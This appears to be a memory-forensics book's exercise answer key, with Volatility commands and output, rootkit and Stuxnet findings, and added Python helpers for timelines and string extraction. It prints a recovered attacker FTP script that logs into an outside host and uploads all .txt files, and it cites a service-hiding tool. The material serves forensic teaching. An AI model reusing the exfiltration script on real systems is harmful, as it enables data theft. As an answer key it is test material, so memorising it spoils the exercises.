5. Run Bulk Extractor or CapLoader against a memory image. Can you trace back the network activity to process(es) or driver(s) that generated it?

The correct answer is: N/A

6. Perform the following steps:
A) Use Internet Explorer v4 - v9 on one of your virtual machines to access web pages
B) Visit an FTP site with Windows Explorer
C) Acquire memory from your system
D) Use the iehistory plugin against the IE and Explorer process to gather artifacts. Does it contain what you expect?

The correct answer is: N/A

7. Use the filescan and dumpfiles plugins to extract and analyze the HOSTS file from some of your memory dumps.
Here is an example:

$ python vol.py -f sample007.bin filescan | grep hosts
Volatility Foundation Volatility Framework 2.4 (Beta)
0x0000000002192f90      1      0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts

$ python vol.py -f sample007.bin dumpfiles -Q 0x0000000002192f90 -D . --name
Volatility Foundation Volatility Framework 2.4 (Beta)
DataSectionObject 0x02192f90   None   \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts

$ strings file.None.0x8211f1f8.hosts.dat
# Copyright (c) 1993-1999 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
# For example:
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
127.0.0.1       localhost

----------------------------------------------------------------------
Chapter 12: Services
----------------------------------------------------------------------

1. Which of the following is NOT a reason why malware uses services:
A) For persistence
B) To load kernel drivers
C) To get code running inside services.exe
D) To hide among the various svchost.exe processes that you typically see

The correct answer is: C

2. Malware that leverages services must directly or indirectly call CreateService and StartService eventually. True or False?

The correct answer is: False (it can call native APIs such as NdrClientCall and bypass the higher-level APIs)

3. Perform the following steps:
A) Run servicedll_whitelist.py on one of your systems (make sure to install Pywin32 first)
B) Dump memory from the system
C) Run svcscan with the --verbose flag to see the ServiceDll values
D) Can you spot any discrepancies?

The correct answer is: N/A

4. Perform the following steps:
A) Create a memory dump of your Windows XP or 2003 system
B) Download the UnlinkServiceRecord.zip tool from https://code.google.com/p/malwarecookbook/source/browse/trunk/17/10/UnlinkServiceRecord.zip
C) Choose a service that's running and unlink it with the tool
D) Type "sc query NAME" on command line (where NAME is the name of the service you unlinked). Can the system find any information on that service?
E) Dump memory a second time
F) Use the svcscan plugin to detect the unlinked service

The correct answer is: N/A (see the "Revealing Hidden Services" section of Chapter 12)

5. Analyze sample001.bin.
A) What new service did the malware install? How do you know it's new?
B) What is the path to the malicious DLL that implements the service?
C) Google the name of the service. Is it related to any known exploits or threat groups?
D) Is the service running? If so, what is the host process ID?
E) Dump the malicious DLL from memory for static analysis

The correct answer is: The malware created 6to4. You can tell it's new because alphabetically 6to4 should be near the top of the list, but svcscan shows its order is at the very end (after xmlprov). services.exe builds its database alphabetically at boot and appends services created later, so 6to4 was added after the last reboot.
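The ordering heuristic above can be run over a whole svcscan listing rather than eyeballed. This is an added Python 3 example, not the plugin's own code: it parses records in the svcscan text layout (a constructed excerpt; the xmlprov and 6to4 records match the sample001.bin output in this answer, the W32Time record and its offset are illustrative) and reports every service whose name sorts before a service that services.exe loaded earlier, which marks it as created after boot. Registry enumeration is case-insensitive, so `str.lower()` is used as an approximation of the database order.

```python
# Constructed excerpt in the svcscan record layout. The xmlprov (227) and
# 6to4 (228) records match the sample001.bin output; the W32Time record
# and its offset are illustrative.
SVCSCAN_SAMPLE = r"""
Volatility Foundation Volatility Framework 2.4 (Beta)
Offset: 0x389c40
Order: 226
Start: SERVICE_AUTO_START
Process ID: 1024
Service Name: W32Time
Display Name: Windows Time
Service Type: SERVICE_WIN32_SHARE_PROCESS
Service State: SERVICE_RUNNING
Binary Path: C:\WINDOWS\System32\svchost.exe -k netsvcs

Offset: 0x389cd0
Order: 227
Start: SERVICE_DEMAND_START
Process ID: -
Service Name: xmlprov
Display Name: Network Provisioning Service
Service Type: SERVICE_WIN32_SHARE_PROCESS
Service State: SERVICE_STOPPED
Binary Path: -

Offset: 0x389d60
Order: 228
Start: SERVICE_AUTO_START
Process ID: 1024
Service Name: 6to4
Display Name: Microsoft Device Manager
Service Type: SERVICE_WIN32_SHARE_PROCESS
Service State: SERVICE_RUNNING
Binary Path: C:\WINDOWS\System32\svchost.exe -k netsvcs
"""


def parse_svcscan(text):
    """Split svcscan output into one dict per record, keyed by field name.
    A new record starts at each 'Offset:' line; lines without a colon
    (the banner, '[snip]') are ignored."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "Offset":
            current = {"Offset": value}
            records.append(current)
        elif current is not None:
            current[key] = value
    for rec in records:
        rec["Order"] = int(rec["Order"])
    return records


def database_sort_key(name):
    # services.exe builds its list from the registry, whose key enumeration
    # is case-insensitive; lower-casing approximates that ordering.
    return name.lower()


def out_of_order_services(records):
    """Services that break the alphabetical sequence of the boot-time
    database: a name sorting before an earlier-loaded service can only
    have been appended later, i.e. created after the last reboot."""
    flagged = []
    highest = None
    for rec in sorted(records, key=lambda r: r["Order"]):
        key = database_sort_key(rec["Service Name"])
        if highest is not None and key < highest:
            flagged.append(rec)
        else:
            highest = key
    return flagged


if __name__ == "__main__":
    for rec in out_of_order_services(parse_svcscan(SVCSCAN_SAMPLE)):
        print("order %d: %s (%s) is out of alphabetical order -> added after boot"
              % (rec["Order"], rec["Service Name"], rec["Binary Path"]))
```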
$ python vol.py -f sample001.bin svcscan
[snip]
Offset: 0x389cd0
Order: 227
Start: SERVICE_DEMAND_START
Process ID: -
Service Name: xmlprov
Display Name: Network Provisioning Service
Service Type: SERVICE_WIN32_SHARE_PROCESS
Service State: SERVICE_STOPPED
Binary Path: -

Offset: 0x389d60
Order: 228
Start: SERVICE_AUTO_START
Process ID: 1024
Service Name: 6to4
Display Name: Microsoft Device Manager
Service Type: SERVICE_WIN32_SHARE_PROCESS
Service State: SERVICE_RUNNING
Binary Path: C:\WINDOWS\System32\svchost.exe -k netsvcs

Using the --verbose flag to svcscan will show the ServiceDll path of C:\WINDOWS\system32\6to4ex.dll

The 6to4 service is not associated with any particular threat group per se, although many have abused it in the past. 6to4 is a legitimate component of the OS (it helps migrate IPv4 to IPv6), but its name is often hijacked. The service is currently running with PID 1024. You can dump the DLL with dlldump.

----------------------------------------------------------------------
Chapter 13: Kernel Forensics and Rootkits
----------------------------------------------------------------------

1. If a kernel module unlinks from the PsLoadedModuleList, manipulates the MmLd pool tags, and zeroes out its PE header, you can still find the malicious rootkit code how?
A) By following thread start addresses
B) By following kernel callbacks
C) By following timer DPCs
D) By analyzing corresponding driver objects
E) All of the above

The correct answer is: E

2. You may not find entries in the "services" key of the registry for drivers loaded via NtLoadDriver. True or False?

The correct answer is: True (because malware can delete the registry keys after loading the driver)

3. Perform the following steps:
A) Run Process Explorer from Sysinternals on a 64-bit Windows system
B) Dump memory of the system
C) Run the modules plugin. Does Process Explorer show up at the start or end of the list? Why?
D) Run the callbacks plugin. What types of callbacks does Process Explorer use?

The correct answer is: Yes, the Process Explorer kernel module will show up near the end of the list, since modules are added to the list sequentially in load order. Process Explorer uses process creation, thread creation, and image load callbacks.

4. Perform the following steps on sample008.bin:
A) Determine if the system is infected
B) Identify and extract the rootkit code (if any) from kernel memory
C) What is/was the name of the driver file on disk?
D) For extra credit, find the base address of the rootkit driver in memory, extract it, and repair the PE header so you can load it in IDA Pro for reverse engineering.

Here are some of the ways you can detect this rootkit. First, there are various orphan threads:

$ python vol.py -f sample008.bin threads -F OrphanThread
Volatility Foundation Volatility Framework 2.4 (Beta)
[x86] Gathering all referenced SSDTs from KTHREADs...
Finding appropriate address space for tables...
------
ETHREAD: 0xff1f92b0 Pid: 4 Tid: 1648
Tags: OrphanThread,SystemThread
Created: 2010-08-15 19:26:13 UTC+0000
Exited: 1970-01-01 00:00:00 UTC+0000
Owning Process: System
Attached Process: System
State: Waiting:DelayExecution
BasePriority: 0x8
Priority: 0x8
TEB: 0x00000000
StartAddress: 0xf2edd150 UNKNOWN
ServiceTable: 0x80552180
  [0] 0x80501030
  [1] 0x00000000
  [2] 0x00000000
  [3] 0x00000000
Win32Thread: 0x00000000
CrossThreadFlags: PS_CROSS_THREAD_FLAGS_SYSTEM
0xf2edd150 803d782aeff200   CMP BYTE [0xf2ef2a78], 0x0
0xf2edd157 7437             JZ 0xf2edd190
0xf2edd159 56               PUSH ESI
0xf2edd15a bef0d0edf2       MOV ESI, 0xf2edd0f0
0xf2edd15f ff35702aeff2     PUSH DWORD [0xf2ef2a70]
0xf2edd165 ff               DB 0xff
0xf2edd166 15               DB 0x15
0xf2edd167 0c               DB 0xc
------
ETHREAD: 0x0113e4a8 Pid: 4 Tid: 600
Tags: OrphanThread,ScannerOnly,SystemThread
Created: 2010-08-11 06:09:35 UTC+0000
Exited: 2010-08-11 06:09:35 UTC+0000
Owning Process: System
Attached Process: System
State: Terminated
BasePriority: 0x8
Priority: 0x18
TEB: 0x00000000
StartAddress: 0xf2fe2150 UNKNOWN
ServiceTable: 0x80552180
  [0] 0x80501030
  [1] 0x00000000
  [2] 0x00000000
  [3] 0x00000000
Win32Thread: 0x00000000
CrossThreadFlags: PS_CROSS_THREAD_FLAGS_SYSTEM, PS_CROSS_THREAD_FLAGS_TERMINATED
------
ETHREAD: 0xff2674a0 Pid: 4 Tid: 1720
Tags: OrphanThread,SystemThread
Created: 2010-08-15 19:26:13 UTC+0000
Exited: 1970-01-01 00:00:00 UTC+0000
Owning Process: System
Attached Process: System
State: Waiting:DelayExecution
BasePriority: 0x8
Priority: 0x8
TEB: 0x00000000
StartAddress: 0xf2edc54e UNKNOWN
ServiceTable: 0x80552180
  [0] 0x80501030
  [1] 0x00000000
  [2] 0x00000000
  [3] 0x00000000
Win32Thread: 0x00000000
CrossThreadFlags: PS_CROSS_THREAD_FLAGS_SYSTEM
0xf2edc54e 803d682aeff200   CMP BYTE [0xf2ef2a68], 0x0
0xf2edc555 744e             JZ 0xf2edc5a5
0xf2edc557 56               PUSH ESI
0xf2edc558 57               PUSH EDI
0xf2edc559 be9ac3edf2       MOV ESI, 0xf2edc39a
0xf2edc55e bfecc3edf2       MOV EDI, 0xf2edc3ec
0xf2edc563 ff               DB 0xff
0xf2edc564 35               DB 0x35
0xf2edc565 b4               DB 0xb4
------
ETHREAD: 0x80f334a8 Pid: 4 Tid: 1992
Tags: OrphanThread,SystemThread
Created: 2010-08-15 19:26:13 UTC+0000
Exited: 1970-01-01 00:00:00 UTC+0000
Owning Process: System
Attached Process: System
State: Waiting:DelayExecution
BasePriority: 0x8
Priority: 0x8
TEB: 0x00000000
StartAddress: 0xf2edba46 UNKNOWN
ServiceTable: 0x80552180
  [0] 0x80501030
  [1] 0x00000000
  [2] 0x00000000
  [3] 0x00000000
Win32Thread: 0x00000000
CrossThreadFlags: PS_CROSS_THREAD_FLAGS_SYSTEM
0xf2edba46 803d542aeff200   CMP BYTE [0xf2ef2a54], 0x0
0xf2edba4d 745e             JZ 0xf2edbaad
0xf2edba4f 53               PUSH EBX
0xf2edba50 8b1d0ce1edf2     MOV EBX, [0xf2ede10c]
0xf2edba56 56               PUSH ESI
0xf2edba57 57               PUSH EDI
0xf2edba58 bf3eb9edf2       MOV EDI, 0xf2edb93e
0xf2edba5d be               DB 0xbe

All of the StartAddress fields tell you where the rootkit code exists.
There is also a suspiciously named driver:
$ python vol.py -f sample008.bin driverscan
Volatility Foundation Volatility Framework 2.4 (Beta)
Offset(P)          #Ptr #Hnd Start      Size       Service Key          Name         Driver Name
------------------ ---- ---- ---------- ---------- -------------------- ------------ -----------
0x0000000001058388    4    0 0xfc76b000     0x6b00 Fdc                  Fdc          \Driver\Fdc
0x0000000001058e28    4    0 0xfc93b000     0x3c80 serenum              serenum      \Driver\serenum
0x0000000001059258    4    0 0xfc54b000     0xfd80 Serial               Serial       \Driver\Serial
0x00000000010593e8    4    0 0xfc121000    0x13900 Parport              Parport      \Driver\Parport
0x000000000106fca0    3    0 0xf3a85000    0x20f00 IpNat                IpNat        \Driver\IpNat
0x000000000108ef38    2    0 0x00000000        0x0 tmryq....sys
[snip]
Unfortunately, the driver's start address and size have been zeroed in its DRIVER_OBJECT (potentially to defeat tools that dump a driver by its base and size). The filescan plugin shows the original path of the driver on disk:
$ python vol.py -f sample008.bin filescan | grep tmr
Volatility Foundation Volatility Framework 2.4 (Beta)
0x0000000001094ea0      1      0 R--r-d \Device\HarddiskVolume1\WINDOWS\system32\drivers\tmryqyrznr2.sys
You can extract a copy from the file cache with dumpfiles (only pages that are still cached come back; anything never read or already evicted is zero-filled in the output):
$ python vol.py -f sample008.bin dumpfiles -Q 0x0000000001094ea0 -D . --name
Volatility Foundation Volatility Framework 2.4 (Beta)
ImageSectionObject 0x01094ea0   None   \Device\HarddiskVolume1\WINDOWS\system32\drivers\tmryqyrznr2.sys
DataSectionObject 0x01094ea0   None   \Device\HarddiskVolume1\WINDOWS\system32\drivers\tmryqyrznr2.sys
5. Analyze sample007.bin:
A) Does this rootkit work by hooking IRP functions or using layered devices?
B) What functionality or capabilities can you uncover?
C) Are any of the kernel modules digitally signed?
D) Does the rootkit install any callbacks or timers?
E) Extract the rootkit code, fix the PE header (if necessary), and load it into IDA Pro. Label the malicious functions based on the addresses you see in the answers to A and D.
The correct answer is: This memory image is infected with Stuxnet; you can read about its artifacts here: http://mnin.blogspot.com/2011/06/examining-stuxnets-footprint-in-memory.html
----------------------------------------------------------------------
Chapter 14: Windows GUI Subsystem, Part I
----------------------------------------------------------------------
1. Perform the following steps:
A) Configure one of your virtual machines with multiple users
B) Log onto the console with one user account and RDP with another user account
C) Acquire a memory dump from the system
D) Run the screenshots plugin. Do you see each user's desktop?
E) Run the sessions plugin. Can you tell which user is logged in via RDP?
The correct answer is: To answer E, look at which session has rdpclip.exe running and RDPDD.dll loaded. Then use the getsids plugin to translate the SIDs of those processes to a user name.
2. Perform the following steps:
A) Launch Sysinternals Desktops and create some additional desktops
B) Execute some applications on each desktop
C) Use WinLister or Spy++ on your main desktop. Can you see the windows in other desktops?
D) Run the desktops Volatility plugin. Do you see the new desktops? Are the proper threads/processes associated with the proper desktops?
E) Run the windows and wintree plugins.
The correct answer is: Using WinLister or Spy++ will not show the windows on other desktops (they enumerate only the calling thread's desktop), whereas the memory plugins see every desktop in the session.
3. Analyze sample007.bin.
A) Which window is monitoring USB insertions?
B) What is the address of the malicious window procedure?
C) What is the window's class atom (integer) value?
D) Run the atoms or atomscan plugin. Do you see the class atom string?
The correct answer is: AFX64c313 (the window class name).
See the "Artifact 17 and 18: Windows & Classes" section of http://mnin.blogspot.com/2011/06/examining-stuxnets-footprint-in-memory.html
----------------------------------------------------------------------
Chapter 15: Windows GUI Subsystem, Part II
----------------------------------------------------------------------
1. Perform the following steps on sample009.bin:
A) Run the messagehooks plugin. Are there any global hooks?
B) What type of messages are being filtered/hooked?
C) What is the full path to the injected hook DLL?
D) What is the address of the hook handler function inside the DLL?
E) Extract the malicious DLL and analyze the handler in IDA Pro. What is the purpose of the hook?
The correct answer is: Yes, the hooks are global (HF_GLOBAL flag). WH_GETMESSAGE messages are being filtered. The DLL is on the "Mal Ware" user's desktop. The hook procedure is at RVA 0x00001fd9 inside the DLL. You can dump the DLL with dlldump, load it in IDA Pro, and go to address BASE + 0x00001fd9. The function just calls CallNextHookEx: there is no payload, the hook exists only to get the DLL loaded into every process that pumps GUI messages (the classic SetWindowsHookEx injection technique).
$ python vol.py -f sample009.bin messagehooks
Volatility Foundation Volatility Framework 2.4 (Beta)
Offset(V)  Sess Desktop              Thread                         Filter               Flags                Function   Module
---------- ---- -------------------- ------------------------------ -------------------- -------------------- ---------- ------
0xbc693988 0    WinSta0\Default                                     WH_GETMESSAGE        HF_ANSI, HF_GLOBAL   0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll
0xbc693988 0    WinSta0\Default      384 (KernelDrv.exe 352)        WH_GETMESSAGE        HF_ANSI, HF_GLOBAL   0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll
0xbc693988 0    WinSta0\Default      2024 (lanmanwrk.exe 920)       WH_GETMESSAGE        HF_ANSI, HF_GLOBAL   0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll
0xbc693988 0    WinSta0\Default      1392 (lanmanwrk.exe 920)       WH_GETMESSAGE        HF_ANSI, HF_GLOBAL   0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll
0xbc693988 0    WinSta0\Default      1584 (explorer.exe 1624)       WH_GETMESSAGE        HF_ANSI, HF_GLOBAL   0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll
0xbc693988 0    WinSta0\Default      252 (VMwareUser.exe 1768)      WH_GETMESSAGE        HF_ANSI, HF_GLOBAL   0x00001fd9 C:\Documents and Settings\Mal Ware\Desktop\Dll.dll
2. Perform the following steps on your own virtual machine:
A) Copy message_hook_installer.exe and message_hooklib.dll to your machine
B) Double-click the exe file
C) Acquire a memory dump
D) Perform the same steps as question #1
The correct answer is: N/A
3. Perform the following steps on your own virtual machine:
A) Copy some text to your clipboard
B) Copy a file from Windows Explorer
C) Acquire a memory dump
D) Run the clipboard plugin. Do you see what you expect?
The correct answer is: N/A
----------------------------------------------------------------------
Chapter 16: Disk Artifacts in Memory
----------------------------------------------------------------------
1. Run the mftparser plugin against some of your memory dumps. Collect the output in body file format and build a timeline.
What were the most recently accessed and created files? You can do this like:
$ python vol.py -f MEMORY.DMP --profile=PROFILE mftparser --output=body --output-file=body.txt
$ mactime -b body.txt -d -z UTC > timeline.txt
(-z UTC keeps the timeline in UTC, which is how Volatility reports every timestamp; -d produces comma-delimited output that imports into a spreadsheet.)
2. Analyze sample004.bin with mftparser. Specifically, extract the MFT-resident file data. Can you find any attacker scripts?
The correct answer is: Yes. The resident $DATA of WINDOWS\system32\systems\f.txt is a script for the Windows ftp.exe client: it opens 66.32.119.38, logs in as jack with the password 2awes0me, sets the local directory to C:\WINDOWS\System32\systems and the remote directory to /home/jack, switches to binary mode, uploads every .txt file with mput, and disconnects. It is an exfiltration script.
f.txt:
MFT entry found at offset 0x15938800
Type: In Use & File
Record Number: 12030
Number of fixup array vals 3
Link count: 1
Sequence Value: 0x3
Fixup Array: 0x9 0x0 0x0

$STANDARD_INFO
Creation            Modified            MFT Altered         Access Date         Type
------------------- ------------------- ------------------- ------------------- ----
2012-04-28 02:01:43 2012-04-28 02:01:43 2012-04-28 02:01:43 2012-04-28 02:01:43 Archive

$FILE_NAME
Creation            Modified            MFT Altered         Access Date         Name/Path
------------------- ------------------- ------------------- ------------------- ---------
2012-04-28 02:01:43 2012-04-28 02:01:43 2012-04-28 02:01:43 2012-04-28 02:01:43 f.txt
Full Path: WINDOWS\system32\systems\f.txt

$DATA
0x00000000: 7b 00 00 00 18 00 00 00 6f 70 65 6e 20 36 36 2e   {.......open.66.
0x00000010: 33 32 2e 31 31 39 2e 33 38 0d 0a 6a 61 63 6b 0d   32.119.38..jack.
0x00000020: 0a 32 61 77 65 73 30 6d 65 0d 0a 6c 63 64 20 63   .2awes0me..lcd.c
0x00000030: 3a 5c 57 49 4e 44 4f 57 53 5c 53 79 73 74 65 6d   :\WINDOWS\System
0x00000040: 33 32 5c 73 79 73 74 65 6d 73 0d 0a 63 64 20 20   32\systems..cd..
0x00000050: 2f 68 6f 6d 65 2f 6a 61 63 6b 0d 0a 62 69 6e 61   /home/jack..bina
0x00000060: 72 79 0d 0a 6d 70 75 74 20 22 2a 2e 74 78 74 22   ry..mput."*.txt"
0x00000070: 0d 0a 64 69 73 63 6f 6e 6e 65 63 74 0d 0a 62 79   ..disconnect..by
0x00000080: 65 0d 0a 00 00 00 00 00                           e.......
For more information, see http://volatility-labs.blogspot.com/2012/10/solving-grrcon-network-forensics.html
3. Create one or more ADS files on your system. Acquire memory and run mftparser. Does it find the ADS associations?
The correct answer is: N/A
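What mactime does with the body file in question 1 (and again in the Chapter 18 timelining exercise) is merge the four timestamps of every record into one sorted stream and tag each event with the MACB flags it carries. The following is an added example (not the book's code and not Sleuth Kit's) that reimplements that step over the TSK 3.x body format mftparser writes, so you can see exactly how a "most recently accessed" or "most recently created" answer falls out of the sort. The body lines are constructed: the f.txt record mirrors the MFT entry above, and the ftp.exe and passwords.txt neighbours are invented.

```python
"""Turn a TSK body file into a sorted MACB timeline, as `mactime -b body.txt -d -z UTC` does.

Added example, not the book's or Sleuth Kit's code. SAMPLE_BODY is constructed
(f.txt follows the MFT entry above; the other two records are invented).
Body format: md5|name|inode|mode|uid|gid|size|atime|mtime|ctime|crtime, where
ctime is the MFT-altered time and crtime the creation (birth) time.
"""
from collections import namedtuple
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

BODY_FIELDS = ("md5", "name", "inode", "mode", "uid", "gid", "size",
               "atime", "mtime", "ctime", "crtime")
# body-file column -> letter in the macb string, in output order
FLAG_OF = (("mtime", "m"), ("atime", "a"), ("ctime", "c"), ("crtime", "b"))

Event = namedtuple("Event", "epoch date macb size mode uid gid inode name")


def epoch(ts: str) -> int:
    """'YYYY-MM-DD HH:MM:SS' (UTC, as Volatility prints it) -> Unix epoch."""
    return int(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
               .replace(tzinfo=timezone.utc).timestamp())


T0 = epoch("2012-04-28 02:01:43")     # f.txt's timestamps from the MFT entry above
T_OLD = epoch("2008-04-14 12:00:00")  # hypothetical install time of ftp.exe
SAMPLE_BODY = "\n".join([             # constructed sample input
    f"0|WINDOWS\\system32\\systems\\f.txt|12030|r/rrwxrwxrwx|0|0|131|{T0}|{T0}|{T0}|{T0}",
    f"0|WINDOWS\\system32\\ftp.exe|9921|r/rrwxrwxrwx|0|0|42000|{T0 + 20}|{T_OLD}|{T_OLD}|{T_OLD}",
    f"0|WINDOWS\\system32\\systems\\passwords.txt|12031|r/rrwxrwxrwx|0|0|880|{T0 + 5}|{T0 - 60}|{T0 - 60}|{T0 - 60}",
])


def parse_body(text: str) -> List[Dict[str, object]]:
    rows = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split("|")
        if len(parts) != len(BODY_FIELDS):
            raise ValueError(f"line {n}: expected {len(BODY_FIELDS)} fields, got {len(parts)}")
        rec = dict(zip(BODY_FIELDS, parts))
        for key in ("size", "atime", "mtime", "ctime", "crtime"):
            rec[key] = int(rec[key])
        rows.append(rec)
    return rows


def build_timeline(text: str) -> List[Event]:
    """One Event per (timestamp, file); the flags sharing that second are merged."""
    merged: Dict[Tuple[int, str], Tuple[set, dict]] = {}
    for rec in parse_body(text):
        for col, letter in FLAG_OF:
            t = rec[col]
            if t <= 0:            # 0 / -1 mean "unknown"; mactime leaves them out
                continue
            flags, _ = merged.setdefault((t, rec["name"]), (set(), rec))
            flags.add(letter)
    events = []
    for (t, name), (flags, rec) in sorted(merged.items()):
        macb = "".join(l if l in flags else "." for _, l in FLAG_OF)
        date = datetime.fromtimestamp(t, timezone.utc).strftime("%a %b %d %Y %H:%M:%S")
        events.append(Event(t, date, macb, rec["size"], rec["mode"],
                            rec["uid"], rec["gid"], rec["inode"], name))
    return events


def to_csv(events: List[Event]) -> List[str]:
    """Same columns as `mactime -d`: Date,Size,Type,Mode,UID,GID,Meta,File Name."""
    return ["Date,Size,Type,Mode,UID,GID,Meta,File Name"] + [
        f"{e.date},{e.size},{e.macb},{e.mode},{e.uid},{e.gid},{e.inode},{e.name}"
        for e in events]


def most_recent(events: List[Event], letter: str) -> Optional[Event]:
    """Latest event carrying the given flag: 'a' = accessed, 'b' = created."""
    hits = [e for e in events if letter in e.macb]
    return max(hits, key=lambda e: e.epoch) if hits else None


if __name__ == "__main__":
    timeline = build_timeline(SAMPLE_BODY)
    print("\n".join(to_csv(timeline)))
    print("last created:", most_recent(timeline, "b").name)
    print("last accessed:", most_recent(timeline, "a").name)
```

In the constructed data the sort puts the creation of f.txt immediately before an access to ftp.exe, which is the kind of adjacency the timeline questions are after; on a real body file, feed `to_csv` output from mftparser, timeliner and shellbags into one list before sorting.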
4. Move a file on your machine to the recycle bin. Then analyze your activity with mftparser. Can you find evidence of the "deleted" file? Parse the $I file and recover the original full path.
The correct answer is: N/A (on Vista and later the recycle bin keeps a small $I<id> file per deleted item recording the original path, size, and deletion time; Windows XP used a single INFO2 file instead)
5. Extract all files from one or more memory dumps. Run the UNIX "file" command against the output directory. What types of files did you recover? You can do this like:
$ mkdir output
$ python vol.py -f MEMORY.DMP --profile=PROFILE -D output dumpfiles
$ file output/*
6. Perform the following steps:
A) Install Truecrypt on your machine
B) Create a virtual file-based container
C) Mount the container with or without cached passwords
D) Store some files within the encrypted container
E) Acquire a memory dump from your system
F) Use the truecryptpassphrase, truecryptsummary, and truecryptmaster plugins to investigate the activity
The correct answer is: N/A
7. Assuming your Truecrypt volume was formatted as NTFS, locate its $Mft file and extract it with dumpfiles. Parse it offline to determine the names of other files within the encrypted volume. You can find the $Mft entries with filescan or from the output of truecryptsummary:
$ python vol.py -f MEMORY.DMP --profile=PROFILE filescan | grep Mft
Then pass the physical offset as -Q to dumpfiles. (A mounted container is an ordinary volume to NTFS, so its $Mft sits in the file cache in plaintext even though the container on disk stays encrypted.)
----------------------------------------------------------------------
Chapter 17: Event Reconstruction
----------------------------------------------------------------------
1. Extract strings from one or more of your memory dumps. For example:
$ strings -a -td MEMORY.DMP > strings.txt
$ strings -a -el -td MEMORY.DMP >> strings.txt
(The first pass collects 8-bit ASCII strings, the second 16-bit little-endian Unicode strings; -td prefixes each with its decimal file offset, which the Volatility strings plugin needs in order to map it back to a process.)
2. Translate the strings with Volatility. For example:
$ python vol.py -f MEMORY.DMP --profile=PROFILE strings -s strings.txt > translated.txt
3. Search your translated strings file for activity related to file execution (prefetch), C2 hostnames (this will depend on the malware you install prior to dumping memory), etc.
The correct answer is: N/A
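To make clear what the two strings passes in question 1 produce and why the decimal offsets matter, here is an added example (not the book's code, and no substitute for GNU strings on a multi-gigabyte dump) that extracts ASCII and UTF-16LE strings with offsets in the same `offset text` layout, then does the grep -C style neighbour lookup that question 4 asks for. SAMPLE is a constructed byte blob containing an invented prefetch file name, the same name as a UTF-16LE path, and an HTTP request to an invented host; nothing in it comes from the book's images.

```python
"""ASCII and UTF-16LE string extraction with decimal offsets, as produced by
`strings -a -td` and `strings -a -el -td`, plus a grep -C style context lookup.

Added example, not the book's code. SAMPLE is a constructed blob; the prefetch
name, path and host in it are invented.
"""
import re
from typing import Dict, Iterator, List, Tuple

PRINTABLE = rb"[\x20-\x7e]"


def extract_strings(data: bytes, min_len: int = 4, utf16: bool = False) -> Iterator[Tuple[int, str]]:
    """Yield (offset, text) for every printable run of at least min_len characters.

    utf16=False mirrors `strings -a` (8-bit ASCII); utf16=True mirrors
    `strings -a -el` (16-bit little-endian: every other byte is NUL).
    """
    if utf16:
        pattern = re.compile(rb"(?:%s\x00){%d,}" % (PRINTABLE, min_len))
    else:
        pattern = re.compile(rb"%s{%d,}" % (PRINTABLE, min_len))
    for m in pattern.finditer(data):
        raw = m.group()
        yield m.start(), (raw.decode("utf-16-le") if utf16 else raw.decode("ascii"))


def strings_lines(data: bytes, min_len: int = 4) -> List[str]:
    """ASCII pass first, then the UTF-16LE pass appended, like the two shell
    commands above; `-td` prints the decimal offset right-aligned in 7 columns."""
    lines = [f"{off:7d} {s}" for off, s in extract_strings(data, min_len)]
    lines += [f"{off:7d} {s}" for off, s in extract_strings(data, min_len, utf16=True)]
    return lines


def context(lines: List[str], needle: str, before: int = 2, after: int = 2) -> List[str]:
    """grep -C style: matching lines plus their neighbours, in file order, deduplicated."""
    keep = set()
    for i, line in enumerate(lines):
        if needle in line:
            keep.update(range(max(0, i - before), min(len(lines), i + after + 1)))
    return [lines[i] for i in sorted(keep)]


SAMPLE = (
    b"\x00\x00\x4d\x5a\x90\x00"                                         # junk; "MZ" is too short to count
    + b"EVIL.EXE-1A2B3C4D.pf"                                           # invented prefetch name (ASCII)
    + b"\x00\x01\x02"
    + "C:\\WINDOWS\\Prefetch\\EVIL.EXE-1A2B3C4D.pf".encode("utf-16-le")  # same name inside a UTF-16 path
    + b"\xff\xfe"
    + b"GET /gate.php HTTP/1.1\r\nHost: c2.example.invalid\r\n"         # invented beacon
    + b"\x00" * 4
)


def sample_index() -> Dict[str, int]:
    """Map every string recovered from SAMPLE (both passes) to its offset."""
    found = list(extract_strings(SAMPLE)) + list(extract_strings(SAMPLE, utf16=True))
    return {text: off for off, text in found}


if __name__ == "__main__":
    out = strings_lines(SAMPLE)
    print("\n".join(out))
    print("--- context around gate.php ---")
    print("\n".join(context(out, "gate.php", before=1, after=1)))
```

Note that the UTF-16 pass lists its hits after all of the ASCII ones, so "immediately above or below" in the combined file is only meaningful within one pass; sort the file numerically on the offset column (`sort -n`) if you want the two interleaved by position before looking for neighbours.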
4. Are there any related strings immediately above or below the potentially interesting strings you found in Step 3?
The correct answer is: N/A (hint: use grep -C, grep -A, or grep -B)
5. Isolate the "FREE MEMORY" strings from the translated file. What percentage of the total strings are found in free/deallocated memory?
The correct answer is: N/A
6. What strings are shared between multiple processes? Can you map them back to specific DLLs in those processes?
The correct answer is: N/A (hint: the shared strings will have multiple process IDs in the translated.txt file, because a shared page is mapped into every process that loaded the DLL)
7. Run the cmdscan and consoles plugins against all samples provided with the book as well as your own memory images. Do you find any useful information?
The correct answer is: N/A
----------------------------------------------------------------------
Chapter 18: Timelining
----------------------------------------------------------------------
1. Most timestamps found in Windows memory dumps are in local time. True or False?
The correct answer is: False (they are in UTC)
